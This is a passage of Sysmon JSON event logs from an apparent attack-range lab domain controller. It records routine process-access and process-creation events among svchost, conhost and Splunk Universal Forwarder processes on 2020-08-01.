C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:50.945\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0422-5F25-0000-001083880B00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:50.945","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0422-5F25-0000-001083880B00}","TargetProcessId":"2952","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.086\r\nSourceProcessGUID: {A837DB8D-0422-5F25-0000-001083880B00}\r\nSourceProcessId: 2952\r\nSourceThreadId: 2844\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.086","SourceProcessGUID":"{A837DB8D-0422-5F25-0000-001083880B00}","SourceProcessId":"2952","SourceThreadId":"2844","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.618\r\nProcessGuid: {A837DB8D-0423-5F25-0000-0010698A0B00}\r\nProcessId: 4636\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.618","ProcessGuid":"{A837DB8D-0423-5F25-0000-0010698A0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:51.617\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0423-5F25-0000-0010698A0B00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:51.617","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0423-5F25-0000-0010698A0B00}","TargetProcessId":"4636","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program 